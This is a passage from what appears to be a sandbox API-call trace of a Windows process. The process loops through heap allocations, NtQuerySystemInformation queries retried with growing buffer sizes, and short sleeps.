lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.891] Sleep (dwMilliseconds=0x110) [0183.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0183.953] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0183.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.954] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0183.954] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0183.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0183.956] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0183.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.957] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0183.957] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0183.958] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.958] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0183.959] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0183.959] Sleep (dwMilliseconds=0x110) [0184.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0184.016] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0184.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0184.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0184.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0184.019] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0184.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.020] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0184.020] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0184.021] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.021] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0184.022] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.022] Sleep (dwMilliseconds=0x110) [0184.067] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0184.067] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0184.068] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.068] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0184.068] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0184.069] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.069] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0184.070] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0184.070] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.076] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0184.077] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0184.077] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.078] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0184.079] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.079] Sleep (dwMilliseconds=0x110) [0184.460] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0184.460] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0184.461] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.461] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0184.462] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0184.462] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.462] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0184.463] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0184.463] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.463] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0184.463] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0184.464] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.465] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0184.465] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.465] Sleep (dwMilliseconds=0x110) [0184.540] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0184.540] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0184.541] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.542] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0184.542] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0184.543] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.543] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0184.545] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0184.545] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.545] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0184.546] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0184.546] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0184.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.547] Sleep (dwMilliseconds=0x110) [0184.598] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0184.598] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0184.598] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.599] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0184.599] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0184.599] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.600] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0184.600] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0184.601] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.605] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0184.605] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0184.606] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.608] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0184.609] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.609] Sleep (dwMilliseconds=0x110) [0184.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0184.641] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0184.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0184.642] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0184.643] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0184.643] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0184.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.644] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0184.644] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0184.645] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.645] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0184.646] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.646] Sleep (dwMilliseconds=0x110) [0184.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0184.704] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0184.705] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.705] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0184.705] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0184.706] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.706] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0184.707] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0184.707] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.708] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0184.708] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0184.708] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.709] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0184.709] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.710] Sleep (dwMilliseconds=0x110) [0184.758] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0184.758] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0184.759] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.765] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0184.765] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0184.766] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0184.766] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0184.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0184.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0184.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0184.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.769] Sleep (dwMilliseconds=0x110) [0184.985] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0184.985] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0184.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0184.987] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0184.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.988] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0184.988] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0184.989] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.989] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0184.989] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0184.990] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.990] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0184.991] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0184.991] Sleep (dwMilliseconds=0x110) [0185.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0185.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0185.004] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.005] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0185.005] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.006] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0185.006] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0185.007] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.007] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0185.008] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.008] Sleep (dwMilliseconds=0x110) [0185.015] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0185.015] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.015] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0185.016] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.016] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0185.017] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0185.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0185.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0185.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.020] Sleep (dwMilliseconds=0x110) [0185.185] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0185.185] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.186] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.187] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0185.187] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.188] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.188] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0185.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.189] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0185.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0185.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0185.192] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.192] Sleep (dwMilliseconds=0x110) [0185.355] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0185.355] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.356] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.357] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0185.358] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.359] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.359] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0185.359] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0185.360] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0185.360] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0185.360] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0185.361] HeapFree (in: 